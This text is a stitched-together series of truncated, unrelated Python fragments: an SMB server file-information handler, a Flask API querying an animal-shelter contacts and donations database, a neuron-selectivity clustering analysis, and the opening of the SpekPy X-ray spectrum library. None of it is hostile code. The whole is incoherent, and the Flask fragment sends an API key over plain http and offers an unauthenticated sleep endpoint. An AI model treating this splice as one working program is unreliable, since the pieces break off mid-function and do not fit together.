errorCode = STATUS_OBJECT_NAME_NOT_FOUND
if errorCode == STATUS_SUCCESS:
respParameters = smb.SMBSetPathInformationResponse_Parameters()
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
@staticmethod
def setFileInformation(connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
connData = smbServer.getConnectionData(connId)
respSetup = b''
respParameters = b''
respData = b''
errorCode = STATUS_SUCCESS
setFileInfoParameters = smb.SMBSetFileInformation_Parameters(parameters)
if recvPacket['Tid'] in connData['ConnectedShares']:
if setFileInfoParameters['FID'] in connData['OpenedFiles']:
fileName = connData['OpenedFiles'][setFileInfoParameters['FID']]['FileName']
informationLevel = setFileInfoParameters['InformationLevel']
if informationLevel == smb.SMB_SET_FILE_DISPOSITION_INFO:
infoRecord = smb.SMBSetFileDispositionInfo(parameters)
if infoRecord['DeletePending'] > 0:
# Mark this file for removal after closed
connData['OpenedFiles'][setFileInfoParameters['FID']]['DeleteOnClose'] = True
respParameters = smb.SMBSetFileInformationResponse_Parameters()
elif informationLevel == smb.SMB_SET_FILE_BASIC_INFO:
infoRecord = smb.SMBSetFileBasicInfo(data)
# Creation time won't be set, the other ones we play with.
atime = infoRecord['LastAccessTime']
if atime == | |
from api.api import common_api
from config import engine
from flask import jsonify , current_app
from sqlalchemy.sql import text
import requests
import time
from datetime import datetime
from api.fake_data import sl_mock_data
try:
from secrets_dict import SHELTERLUV_SECRET_TOKEN
except ImportError:
# Not running locally
print("Couldn't get SHELTERLUV_SECRET_TOKEN from file, trying environment **********")
from os import getenv
SHELTERLUV_SECRET_TOKEN = getenv('SHELTERLUV_SECRET_TOKEN')
if not SHELTERLUV_SECRET_TOKEN:
print("Couldn't get secrets from file or environment",
"Defaulting to Fake Data")
from api import jwt_ops
@common_api.route('/api/timeout_test/<duration>', methods=['GET'])
def get_timeout(duration):
start = datetime.now().strftime("%H:%M:%S");
time.sleep(int(duration))
stop = datetime.now().strftime("%H:%M:%S");
results = jsonify({'result': 'success', 'duration': duration, 'start': start, 'stop': stop})
return results
@common_api.route('/api/contacts/<search_text>', methods=['GET'])
@jwt_ops.jwt_required()
def get_contacts(search_text):
with engine.connect() as connection:
search_text = search_text.lower()
names = search_text.split(" ")
if len(names) == 2:
query = text("""select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
from pdp_contacts
left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
where archived_date is null AND ( (lower(first_name) like lower(:name1) and lower(last_name) like lower(:name2))
OR (lower(first_name) like lower(:name2) and lower(last_name) like lower(:name1)) )
order by lower(last_name), lower(first_name)""")
query_result = connection.execute(query, name1='{}%'.format(names[0]), name2='{}%'.format(names[1]))
elif len(names) == 1:
query = text("""select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
from pdp_contacts
left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
where archived_date is null AND ( lower(first_name) like lower(:search_text)
OR lower(last_name) like lower(:search_text) )
order by lower(last_name), lower(first_name)""")
query_result = connection.execute(query, search_text='{}%'.format(search_text))
query_result_json = [dict(row) for row in query_result]
results = jsonify({'result': query_result_json})
return results
@common_api.route('/api/rfm/<label>/<limit>', methods=['GET'])
@common_api.route('/api/rfm/<label>', methods=['GET'])
@jwt_ops.jwt_required()
def get_rfm(label, limit=None):
with engine.connect() as connection:
query_string = """select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
from pdp_contacts
left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
where archived_date is null AND rfm_label like :label
and source_type = 'salesforcecontacts'
order by lower(last_name), lower(first_name)"""
if limit:
query = text(query_string + " limit :limit")
query_result = connection.execute(query, label='{}%'.format(label), limit=limit)
else:
query = text(query_string)
query_result = connection.execute(query, label='{}%'.format(label))
query_result_json = [dict(row) for row in query_result]
results = jsonify({'result': query_result_json})
return results
@common_api.route('/api/rfm/labels', methods=['GET'])
@jwt_ops.jwt_required()
def get_rfm_labels():
with engine.connect() as connection:
query = text("""select rfm_label, rfm_text_color, rfm_color, count(rfm_value) from rfm_scores left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
group by rfm_label, rfm_text_color, rfm_color;""")
query_result = connection.execute(query)
query_result_json = [dict(row) for row in query_result]
results = jsonify({'result': query_result_json})
return results
@common_api.route('/api/360/<matching_id>', methods=['GET'])
@jwt_ops.jwt_required()
def get_360(matching_id):
result = {}
with engine.connect() as connection:
query = text("""select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
from pdp_contacts
left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
where pdp_contacts.matching_id = :matching_id and archived_date is null""")
query_result = connection.execute(query, matching_id=matching_id)
result["contact_details"] = [dict(row) for row in query_result]
for row in result["contact_details"]:
if row["source_type"] == "salesforcecontacts":
donations_query = text("""select cast (close_date as text), cast (amount as float), donation_type, primary_campaign_source
from salesforcedonations
where contact_id = :salesforcecontacts_id""")
salesforce_contacts_query_result = connection.execute(donations_query,
salesforcecontacts_id=row["source_id"])
salesforce_donations_results = [dict(row) for row in salesforce_contacts_query_result]
if len(salesforce_donations_results):
if not 'donations' in result:
result['donations'] = salesforce_donations_results
else:
result['donations'].append(salesforce_donations_results)
if row["source_type"] == "volgistics":
# Shifts data
shifts_query = text("""select volg_id, assignment, site, from_date, cast(hours as float)
from volgisticsshifts where volg_id = :volgistics_id
order by from_date desc
limit 5""")
volgistics_shifts_query_result = connection.execute(shifts_query, volgistics_id=row["source_id"])
volgisticsshifts_results = []
for r in volgistics_shifts_query_result:
shifts = dict(r)
volgisticsshifts_results.append(shifts)
result['shifts'] = volgisticsshifts_results
# Volunteer activity
query_text = """
with activity as
(select from_date, hours from volgisticsshifts where volg_id = :volgistics_id),
alltime as
(select min(from_date) as start_date, sum(hours) as life_hours from activity),
ytd as
(select sum(hours) as ytd_hours from activity where extract(year from from_date) = extract(year from current_date))
select cast(start_date as text), cast(life_hours as float), cast(ytd_hours as float) from alltime, ytd;
"""
hours_query = text(query_text)
hours_query_result = connection.execute(hours_query, volgistics_id=row["source_id"])
result['activity'] = [dict(row) for row in hours_query_result]
if row["source_type"] == "shelterluvpeople":
shelterluv_id = row["source_id"]
result["shelterluv_id"] = shelterluv_id
return jsonify({'result': result})
@common_api.route('/api/person/<matching_id>/animals', methods=['GET'])
@jwt_ops.jwt_required()
def get_animals(matching_id):
result = {
"person_details": {},
"animal_details": {}
}
if not SHELTERLUV_SECRET_TOKEN:
return jsonify(sl_mock_data('animals'))
with engine.connect() as connection:
query = text("select * from pdp_contacts where matching_id = :matching_id and source_type = 'shelterluvpeople' and archived_date is null")
query_result = connection.execute(query, matching_id=matching_id)
rows = [dict(row) for row in query_result]
if len(rows) > 0:
for row in rows:
shelterluv_id = row["source_id"]
person_url = f"http://shelterluv.com/api/v1/people/{shelterluv_id}"
person_details = requests.get(person_url, headers={"x-api-key": SHELTERLUV_SECRET_TOKEN}).json()
if "ID" in person_details:
result["person_details"]["shelterluv_short_id"] = person_details["ID"]
animal_ids = person_details["Animal_ids"]
for animal_id in animal_ids:
animal_url = f"http://shelterluv.com/api/v1/animals/{animal_id}"
animal_details = requests.get(animal_url, headers={"x-api-key": SHELTERLUV_SECRET_TOKEN}).json()
result["animal_details"][animal_id] = animal_details
return result
@common_api.route('/api/person/<matching_id>/animal/<animal_id>/events', methods=['GET'])
@jwt_ops.jwt_required()
def get_person_animal_events(matching_id, animal_id):
result = {}
events = []
if not SHELTERLUV_SECRET_TOKEN:
return jsonify(sl_mock_data('events'))
with engine.connect() as connection:
query = text("select * from pdp_contacts where matching_id = :matching_id and source_type = 'shelterluvpeople' and archived_date is null")
query_result = connection.execute(query, matching_id=matching_id)
rows = [dict(row) for row in query_result]
if len(rows) > 0:
row = rows[0]
shelterluv_id = row["source_id"]
animal_url = f"http://shelterluv.com/api/v1/animals/{animal_id}/events"
event_details = requests.get(animal_url, headers={"x-api-key": SHELTERLUV_SECRET_TOKEN}).json()
for event in event_details["events"]:
for record in event["AssociatedRecords"]:
if record["Type"] == "Person" and record["Id"] == shelterluv_id:
events.append(event)
result[animal_id] = events
return result
@common_api.route('/api/person/<matching_id>/support', methods=['GET'])
@jwt_ops.jwt_required()
def get_support_oview(matching_id):
"""Return these values for the specified match_id:
largest gift, date for first donation, total giving, number of gifts,
amount of first gift, is recurring donor
If consuming this, check number_of_gifts first. If 0, there's no more data
available, so don't try to read any other fields - they may not exist.
"""
# One complication: a single match_id can map to multiple SF ids, so these queries need to
# run on a list of of contact_ids.
# First: get the list of salsforce contact_ids associated with the matching_id
qcids = text("select source_id FROM pdp_contacts where matching_id = :matching_id and source_type = 'salesforcecontacts';")
oview_fields = {}
with engine.connect() as connection:
query_result = connection.execute(qcids, matching_id=matching_id)
rows = [dict(row) for row in query_result]
id_list = []
if len(rows) > 0:
for row in rows:
if row['source_id'].isalnum():
id_list.append(row['source_id'])
else:
current_app.logger.warn("salesforcecontacts source_id " + row['source_id'] + "has non-alphanumeric characters; will not be used")
if len(id_list) == 0: # No ids to query
oview_fields['number_of_gifts'] = 0 # Marker for no support data
return jsonify(oview_fields)
sov1 = text("""SELECT
max(amount) as largest_gift,
min(close_date) as first_donation_date,
sum(amount) as total_giving,
count(amount) as number_of_gifts
FROM
salesforcedonations as sfd
WHERE
contact_id IN :id_list ; """)
sov1 = sov1.bindparams(id_list=tuple(id_list))
sov1_result = connection.execute(sov1)
# query = query.bindparams(values=tuple(values
# rows = [dict(row) for row in sov1_result]
row = dict(sov1_result.fetchone())
if row['largest_gift'] :
oview_fields['largest_gift'] = float(row['largest_gift'])
else:
oview_fields['largest_gift'] = 0.0
# oview_fields['largest_gift'] = float(rows[0]['largest_gift'])
if row['first_donation_date']:
oview_fields['first_donation_date'] = str(row['first_donation_date'])
else:
oview_fields['first_donation_date'] = ''
if row['total_giving']:
oview_fields['total_giving'] = float(row['total_giving'])
else:
oview_fields['total_giving'] = 0.0
oview_fields['number_of_gifts'] = row['number_of_gifts']
# These could be could combined them into a single complex query
sov2 = text("""SELECT
amount as first_gift_amount
FROM
salesforcedonations as sfd
WHERE
contact_id IN :id_list
ORDER BY close_date asc
limit 1 ; """)
sov2 = sov2.bindparams(id_list=tuple(id_list))
sov2_result = connection.execute(sov2)
if sov2_result.rowcount:
fga = sov2_result.fetchone()[0]
if fga:
oview_fields['first_gift_amount'] = float(fga)
else:
oview_fields['first_gift_amount'] = 0.0
else:
oview_fields['first_gift_amount'] = 0.0
sov3 = text("""SELECT
recurring_donor as is_recurring
FROM
salesforcedonations as sfd
WHERE
contact_id IN :id_list
ORDER BY close_date DESC
LIMIT 1; """ )
sov3 = sov3.bindparams(id_list=tuple(id_list))
sov3_result = connection.execute(sov3)
if sov3_result.rowcount:
oview_fields['is_recurring'] = sov3_result.fetchone()[0]
else:
oview_fields['is_recurring'] = False
rfm = text("""SELECT
rfm_score, rfm_color, rfm_label, rfm_text_color
FROM
rfm_scores
left join rfm_mapping on rfm_mapping.rfm_value = rfm_score
WHERE
matching_id = :match_id; """)
rfm = rfm.bindparams(match_id = matching_id)
rfm_result = connection.execute(rfm)
if rfm_result.rowcount:
row = rfm_result.fetchone()
oview_fields['rfm_score'] = row[0]
oview_fields['rfm_color'] = row[1]
oview_fields['rfm_label'] = row[2]
oview_fields['rfm_text_color'] = row[3]
else:
oview_fields['rfm_score'] = ''
oview_fields['rfm_color'] = ''
oview_fields['rfm_label'] = ''
oview_fields['rfm_text_color'] = ''
return jsonify(oview_fields)
else: # len(rows) == 0
current_app.logger.debug('No SF contact IDs found for matching_id ' + str(matching_id))
oview_fields['number_of_gifts'] = 0 # Marker for no data
return jsonify(oview_fields)
@common_api.route('/api/last_analysis', methods=['GET'])
@jwt_ops.jwt_required()
def get_last_analysis():
""" Return the UTC string (e.g., '2021-12-11T02:29:14.830371') representing
when the last analysis run succesfully completed.
Returns an empty string if no results.
"""
last_run = ''
last_stamp = """
select update_stamp
from execution_status
where stage = 'flow' and status = 'complete'
order by update_stamp desc
limit 1;
"""
with engine.connect() | |
0:
print("ERROR: we have an empty cluster list for {}?".format(current_neuron_index))
continue
if current_best_K == 1:
# uniform distrubtion or a higher value of k needed!
print('Neuron {} has a K of 1, may require further investigation!'.format(current_neuron_index))
jitterer(x_data=cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '_kmeans' + '.png', show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=False,
current_neuron_index=current_neuron_index)
fs_plotter(fs=cloud.fs, layer_name='prob_', current_neuron_index=current_neuron_index)
gap_list, max_gap, max_gap_code, max_2_gap, max_2_gap_code \
= [], 0, 'Null', 0, 'Null'
else:
gap_list, max_gap, max_gap_code, max_2_gap, max_2_gap_code \
= find_gaps_between_clusters(cluster_list, dict_keys=[], invert=True)
if len(cluster_list[current_best_K - 1]) == 1:
# we found a grandma cell for one picture
no_of_single_grandma = no_of_single_grandma + 1
# we define the structural range as anything above the biggest gap
if max_gap_code == 1:
# we've found a grandmother cell alike!
no_of_weak_grandmas = no_of_weak_grandmas + 1
print('{} weak grandmas'.format(no_of_weak_grandmas))
No_classes_struct = len(unique_classes_0)
no_of_top_class_in_struct = sum([1 for x in local_list if x[0] == top_class])
struct_no = c_0_no
struct_K = 1
else:
# we got a structured layer at the top
# lets do another k-means
struct_K = max_gap_code
# middle of the gap between structured and unstructured
if not current_best_K == 1:
mid_struct_gap = max(cluster_list[current_best_K - max_gap_code - 1]) \
+ 0.5 * (min(cluster_list[current_best_K - max_gap_code]) - max(
cluster_list[current_best_K - max_gap_code - 1]))
total_range = cloud.maxX - cloud.minX
as_pc = mid_struct_gap / total_range
# numx = len(current_neuron.vector[current_neuron.vector > 0.5 * rangemax])
try:
structured = FastDetK(X=current_neuron, discard=as_pc)
except UserWarning as e:
print('That weird error where it spits on struct region and fails to find any points, sob :(')
continue
max_possible_K = len(set(structured.X)) # to catch when there are repeated values
chosen_max_K = min(max_K_For_Structured, max_possible_K)
structured.runFK(chosen_max_K)
else:
print('Trying a further k-means on Neuron {}, discarding 75% of data'.format(current_neuron_index))
try:
structured = FastDetK(X=current_neuron, discard=75)
except UserWarning as e:
print('That weird error where it spits on struct region and fails to find any points, sob :(')
continue
max_possible_K = len(set(structured.X)) # to catch when there are repeated values
chosen_max_K = min(max_K_For_Structured, max_possible_K)
structured.runFK(chosen_max_K)
print('Updated K of {} for neuron {}'.format(structured.K, current_neuron_index))
gap_list, max_gap, max_gap_code, max_2_gap, max_2_gap_code \
= find_gaps_between_clusters(cluster_list, dict_keys=[], invert=True)
if do_pictures or current_neuron_index in range_for_pictures:
fs_plotter(fs=structured.fs, layer_name='prob_struct_', current_neuron_index=current_neuron_index)
if (structured.K == max_possible_K) and (not max_possible_K == 1):
if (structured.fs[0:max_possible_K - 1] < allowed_error).any():
# one of the smaller numbers of K gives us clusters to within our accuracy
# RE RUN K MEANS!
print('K found that is within error range but not optimal')
structured.runFK(max_possible_K - 1)
updated_cluster_list = {}
print('K of structured layer is {}'.format(structured.K))
K_below_struct = current_best_K - max_gap_code
for old_key in cluster_list.keys():
if old_key < K_below_struct:
updated_cluster_list[old_key] = cluster_list[old_key]
for new_key in structured.clusters.keys():
updated_cluster_list[new_key + K_below_struct] = structured.clusters[new_key]
if do_pictures or current_neuron_index in range_for_pictures:
jitterer(x_data=updated_cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '_heir_kmeans' + '.png',
show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=False,
current_neuron_index=current_neuron_index)
local_list_struct, selected_activations_struct = grab_points_for_a_cluster(current_neuron_index,
min_selected_x_data=min(
structured.X),
max_selected_x_data=max_top_cluster,
acts=acts,
x_data=x_data,
verbose=verbose)
unique_classes_struct = set([x[0] for x in local_list_struct])
No_classes_struct = len(unique_classes_struct)
no_of_top_class_in_struct = sum([1 for x in local_list_struct if x[0] == top_class])
struct_no = structured.N
struct_K = structured.K
# TODO these stats should be a function, here you're doing the same thing 3 times
# did not have time ot write it properly so please fix
# To do!
# now we do whole (half!) range
local_list_half, selected_activations_half = grab_points_for_a_cluster(current_neuron_index,
min_selected_x_data=cloud.midX,
max_selected_x_data=max_top_cluster,
acts=acts,
x_data=x_data,
verbose=verbose)
# c_0_no = len(local_list)
# top_class = local_list[0][0]
unique_classes_half = set([x[0] for x in local_list_half])
No_classes_in = len(unique_classes_half)
no_of_top_class_in_all = sum([1 for x in local_list_half if x[0] == top_class])
extent_of_top_class = find_extent_of_top_class(local_list=local_list_half)
if looking_at_output_layer:
local_list, selected_activations = grab_points_for_a_cluster(current_neuron_index,
min_selected_x_data=0,
max_selected_x_data=max_top_cluster,
acts=acts,
x_data=x_data,
verbose=verbose)
extent_of_top_class = find_extent_of_top_class(local_list=local_list)
local_list = local_list_half[-101:-1]
selected_activations = selected_activations_half[-101:-1]
no_of_top_class_in_top_100 = sum([1 for x in local_list if x[0] == top_class])
no_of_top_class = no_files_in_label[top_class]
if do_ccma_selectivity == True:
# this should be bunged up top as well, but for now...
# irritiatingly to compute class conditional selectivity, we need to cluster by classes sigh
class_cluster_list, min_list, max_list = build_cluster_from_class_label(acts=acts,
current_neuron_index=current_neuron_index,
label_dict=label_dict,
current_neuron=current_neuron,
found_labels=found_labels,
do_check=do_check)
# this computes the CCMAS for the highest mean activating class
ccma_selectivity, mu_max, mu_not_max, max_index = \
compute_ccma_selectivity_neuron(class_cluster_list, found_labels='', class_dict=class_dict,
class_labels=class_labels, top_class='', verbose=verbose)
[top_mean_class, top_mean_code, top_mean_label] = class_lineno_to_name(line_no=max_index,
class_labels=class_labels)
if not top_mean_code == top_class:
print('Class with top activations is not the class with the highest mean activation')
print('Top class: {}; top mean class: {}'.format(top_class_name, top_mean_class))
# the class with the highest activation values is not the same as the class with the highest mean activation value!
# so d oteh computation for the top-most class
ccma_selectivity_top, mu_max_top, mu_not_max_top, max_index_top = \
compute_ccma_selectivity_neuron(class_cluster_list, found_labels='', class_dict=class_dict,
class_labels=class_labels, top_class=top_class, verbose=verbose)
if do_true_picture:
# do it anyway
egg = class_code_to_name(class_name=top_mean_class, class_dict=class_dict,
class_labels=class_labels)
# actual_class = found_labels.index(class_labels[current_neuron_index].split(' ')[0])
print('maximally activated class is {}'.format(top_class_name))
if do_pictures:
jitterer(x_data=class_cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + 'class_' + str(current_neuron_index) + 'cbycMEAN.png',
show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None,
label_dict=label_dict,
outLayerNeuron=True,
current_neuron_index=max_index)
else:
ccma_selectivity_top, mu_max_top, mu_not_max_top, max_index_top = ccma_selectivity, mu_max, mu_not_max, max_index
# sigh, now lets check out the second most mean activating class...
if do_second_Botvinick:
# compare the selectivity of the second most mean activating class
not_class_cluster_list = [class_cluster_list[i] for i in range(len(class_cluster_list)) if
not i == max_index]
ccma_selectivity_2, mu_max_2, mu_not_max_2, max_index_2 = \
compute_ccma_selectivity_neuron(not_class_cluster_list, found_labels='', class_dict=class_dict,
class_labels=class_labels, top_class='', verbose=verbose)
[top_2_mean_class, _, _] = class_lineno_to_name(line_no=max_index_2, class_labels=class_labels)
else:
ccma_selectivity_2, mu_max_2, mu_not_max_2, max_index_2 = 0.0, 0.0, 0.0, max_index
top_2_mean_class = ''
# do ranges
range_top = max(class_cluster_list[max_index_top]) - min(class_cluster_list[max_index_top])
range_mean = max(class_cluster_list[max_index]) - min(class_cluster_list[max_index])
range_2_mean = max(class_cluster_list[max_index_2]) - min(class_cluster_list[max_index_2])
isClassSelective, selectivity, found_class = compute_selectivity_neuron(max_list, min_list,
found_labels, verbose=False)
# if the region above the struct were taken as a code, what would the selectivity be?
gap_selectivity = max_gap / max_activation
if isClassSelective:
# and if it is selective with all points, plot the graph
#foundSelectivityList.append(selectivity)
#foundClassList.append(found_class)
#foundNeuronList.append(current_neuron_index)
if looking_at_output_layer == True:
# as cluster_list is build from label_dict, and label_dict is in a shuffled order
# we must find out which class we are really on!
actual_class = found_labels.index(class_labels[current_neuron_index].split(' ')[0])
print('actual class {}'.format(actual_class))
if do_pictures:
jitterer(x_data=cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '.png', show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=True,
current_neuron_index=actual_class)
else:
if do_pictures or current_neuron_index in range_for_pictures:
# name_leader = 'fc6_layer_neuron'
jitterer(x_data=cluster_list, colour_flag='cluster', title='Yo',
save_label=name_leader + str(current_neuron_index) + '.png', show_plots=False,
save_plots=True,
do_x_axis=True, do_y_axis=False, x_range=None, y_range=None, label_dict=label_dict,
outLayerNeuron=False,
current_neuron_index=0)
row = {'Neuron no.': str(current_neuron_index), # neuron index
'top_class_name': str(top_class_name),
'all_K': str(cloud.K), # no of K for 'All': whole of (midX to maxX) range
'all_No_images': str(cloud.N), # No of images over All
'biggest_gap': str(max_gap), # Size of biggest gap: this defines the start of 'Struct' range
'big_gap_code': str(max_gap_code), # Coded position of gap: 0 is top cluster, counting down
'second_biggest_gap': str(max_2_gap), # Second biggest gap size --> could be used as struct start
'2_Big_gap_code': str(max_2_gap_code), # Gap position code
'top_class': str(top_class), # Class with highest activation- could be a list
'c_0_no': str(c_0_no), # No. images in cluster 0 (top cluster)
'c_0_no_class': str(c_0_no_classes), # No. of classes in top cluster
'struct_no': str(struct_no), # No. of images in structured region
'struct_K': str(struct_K), # No. of clusters in struct range --> this may be after a 2nd kmeans
'struct_no_class': str(No_classes_struct), # No of classes in structured region
'No_top_in_cluster_0': str(c_0_no_classes), # No. of top class in top cluster
'No_top_class_in_struct': str(no_of_top_class_in_struct), # No. of top class in structure
'No_top_class_in_half_range': str(no_of_top_class_in_all), # No. of top class in half range
'No_top_class': str(no_of_top_class), # No in the top class overall
'pc_top_class_in_top_100': str(no_of_top_class_in_top_100), # pc of top class in top 100
'is_class_selective': isClassSelective,
'ccma_selectivity_top': str(ccma_selectivity_top), # ccma_selectivity to top activating class
'mu_max_top': str(mu_max_top), # average activation of top activating class
'ccma_selectivity': str(ccma_selectivity), # ccma_selectivity of highest mean activation class
'mu_max': str(mu_max), # mean of highest mean activatinging class
'mean_act_class_name': str(top_mean_class), # name of highest mean class
'ccma_selectivity_2': str(ccma_selectivity_2),
# ccma_selectivity of 2nd highest mean activation class
'mu_max_2': str(mu_max_2), # mean of second highest mean activatinging class
'mean_act_class_name_2': str(top_2_mean_class), # name of highest mean class
'range_top': str(range_top), # range of | |
<filename>spekpy/SpekPy.py
# For compatibility with Python2 #
from __future__ import print_function, division, absolute_import
##################################
from . import __version__
import spekpy.SpekConstants as Const
from spekpy.IO import find_file, path_file, read_spectrum_from_disk, \
get_script_path, is_file, print_matl_info, print_matls_in_group, \
print_states, print_matls, delete_file
from spekpy.SpekState import State, FiltrationDef
from spekpy.SpekModel import SpekModel
import copy
from spekpy.SpekTools import load_mu_data, change_filtration, \
calculate_air_kerma_from_spectrum, calculate_mean_energy_from_spectrum, \
calculate_effective_energy_from_spectrum, calculate_fluence_from_spectrum,\
calculate_required_filter_thickness, \
calculate_first_half_value_layer_from_spectrum, \
calculate_second_half_value_layer_from_spectrum, \
calculate_output_arrays, \
calculate_homogeneity_coefficient_from_spectrum, \
StandardResults, generate_spectrum, make_composition_def
from spekpy.DataTables import data
from numpy import isclose
from scipy.ndimage import gaussian_filter
class Spek:
def __init__(self,
kvp=None, th=None, dk=None, mu_data_source=None, physics=None,
x=None, y=None, z=None, mas=None, brem=None, char=None, obli=None,
comment=None, targ=None, shift=None, init_default=True):
self._rg, self._pe, self._ne, self._line_data, self._nist_brem_data \
= data
self.state = State()
self.state.spekpy_version = __version__
self.state.script_path = get_script_path()
self.mu_data = None
self.muen_air_data = None
self.model=SpekModel()
if init_default:
# Assign defaults if not specified
th = 12.0 if th is None else th
dk = 0.5 if dk is None else dk
targ = 'W' if targ is None else targ
if kvp is None:
kvp = 100.0 if targ == 'W' else 30.0
x = 0.0 if x is None else x
y = 0.0 if y is None else y
z = 100.0 if z is None else z
mas = 1.0 if mas is None else mas
brem = True if brem is None else brem
char = True if char is None else char
obli = True if obli is None else obli
comment = None if comment is None else comment
physics = Spek.alias('casim') if physics is None \
else Spek.alias(physics.lower())
if mu_data_source is None:
if physics == 'spekcalc' or physics == 'spekpy-v1':
mu_data_source = 'nist'
else:
mu_data_source = 'pene'
# Check validity of inputs
if physics == 'spekcalc' or physics == 'spekpy-v1':
if targ != 'W':
raise Exception("Only tungsten anode available for "
"selected physics mode (targ = 'W')")
if targ not in ['W', 'Mo', 'Rh']:
raise Exception("Requested anode material is not available "
"(targ = 'W', 'Mo' or 'Rh')")
if mu_data_source != 'nist' and mu_data_source != 'pene':
raise Exception("Requested mu_data_source is unrecognized "
"(mu_data_source = 'nist' or 'pene')")
if physics == 'spekcalc' or physics == 'spekpy-v1':
if kvp<10. or kvp>1000.:
raise Exception("Requested kVp is out of range for "
"selected physics model "
"(kvp = 10 to 1000 kV)")
else:
if targ == 'W':
if kvp<20. or kvp>300.:
raise Exception("Requested kVp is out of range for "
"selected physics model and target"
"(kvp = 30 to 300 kV)")
else:
if kvp<20. or kvp>50.:
raise Exception("Requested kVp is out of range for "
"selected physics model and target"
"(kvp = 20 to 50 kV)")
if shift is not None:
if shift > 0.5 or shift < -0.5:
raise Exception("Requested bin shift is outside allowed "
"range (shift = -0.5 to +0.5)")
# Assign parameters to state
self.set_state_parameters(kvp=kvp, th=th, dk=dk, physics=physics,
mu_data_source=mu_data_source, x=x, y=y, z=z, mas=mas,
brem=brem, char=char, obli=obli, targ=targ, shift=shift)
@staticmethod
def alias(name):
"""
A static method to map user physics modes strings to the strings used
internally in the software
:param str name: The name of the physics mode
:return str alias_name: The name used internally for the physics mode
"""
aliases = {'legacy':'spekcalc','default':'spekpy-v1',
'kqp':'spekpy-v2-kqp','sim':'spekpy-v2-sim','uni':'spekpy-v2-uni',
'casim':'spekpy-v2-casim','diff':'spekpy-v2-diff'}
aliases_list = list(aliases.keys())
for alias_name in aliases_list:
aliases[aliases[alias_name]] = aliases[alias_name]
alias_name = aliases[name]
return alias_name
def set_state_parameters(self, **kwargs):
"""
An internal method to set arbitrary attributes in the spekpy state.
If an attribute that affects the model (e.g., kvp, th, dk, physics,
mu_data_source) is in the argument, the spectrum parameters will be
updated.
:param kwargs: Keyword arguments that are supported by the spekpy state
:return :
"""
if 'physics' in kwargs.keys():
kwargs['physics'] = self.alias(kwargs['physics'])
initial_state = copy.deepcopy(self.state)
if kwargs:
model_parameters_changed = False
update_model = False
update_external = False
# Loop through the keywords, validate if they exist in the spekpy
# ... state and update if model parameters have changed
for keyword in kwargs:
if hasattr(self.state.external_spectrum, keyword):
setattr(self.state.external_spectrum, keyword,
kwargs[keyword])
elif hasattr(self.state.model_parameters, keyword):
# Only update if the model parameters really have changed.
if getattr(self.state.model_parameters, keyword) is \
not kwargs[keyword]:
setattr(self.state.model_parameters, keyword,
kwargs[keyword])
model_parameters_changed = True
elif hasattr(self.state.spectrum_parameters, keyword):
setattr(self.state.spectrum_parameters, keyword,
kwargs[keyword])
else:
raise Exception("Keyword argument " + keyword +
" not recognized!")
if self.state.external_spectrum.external_spectrum is None:
if model_parameters_changed:
update_model = True
else:
if model_parameters_changed:
update_external = True
# For the two physics models below, the state needs updating if
# ... the take-off angles changes
if self.state.model_parameters.physics=='spekpy-v2-kqp' or \
self.state.model_parameters.physics=='spekpy-v2-sim':
x=self.state.spectrum_parameters.x
y=self.state.spectrum_parameters.y
z=self.state.spectrum_parameters.z
x_init=initial_state.spectrum_parameters.x
y_init=initial_state.spectrum_parameters.y
z_init=initial_state.spectrum_parameters.z
if z_init is not None:
if not isclose(x_init/z_init,x/z,atol=1e-5) or \
not isclose(y_init/z_init,y/z,atol=1e-5):
update_model = True
if update_model:
# Re-initialize the model parameters
self.mu_data, self.muen_air_data = load_mu_data(
self.state.model_parameters.mu_data_source)
self.spectrum_from_model()
current_filtration = self.state.filtration.filters
self.state.filtration = FiltrationDef()
self.multi_filter(current_filtration)
if update_external:
self.mu_data, self.muen_air_data = load_mu_data(
self.state.model_parameters.mu_data_source)
# Manage normalization by reference air kerma of fluence
if 'ref_kerma' in kwargs or 'ref_flu' in kwargs:
if 'ref_kerma' in kwargs and 'ref_flu' in kwargs:
raise Exception("A reference air kerma and reference"
"fluence cannot both be specified!")
elif 'ref_kerma' in kwargs:
self.state.spectrum_parameters.ref_flu = None
kerma = self.get_kerma(ref_kerma=None)
self.model.norm = \
self.state.spectrum_parameters.ref_kerma / kerma
elif 'ref_flu' in kwargs:
self.state.spectrum_parameters.ref_kerma = None
flu = self.get_flu(ref_flu=None)
self.model.norm = \
self.state.spectrum_parameters.ref_flu / flu
else:
self.model.norm = None
self.state.spectrum_parameters.ref_kerma = None
self.state.spectrum_parameters.ref_flu = None
return self
def parameters_for_calculation(self, **kwargs):
"""
A function to handle parameters in spekpy calculations without setting
the state of spekpy (transient)
This function recognized the following keyword arguments:
x, y, z, brem, char, obli
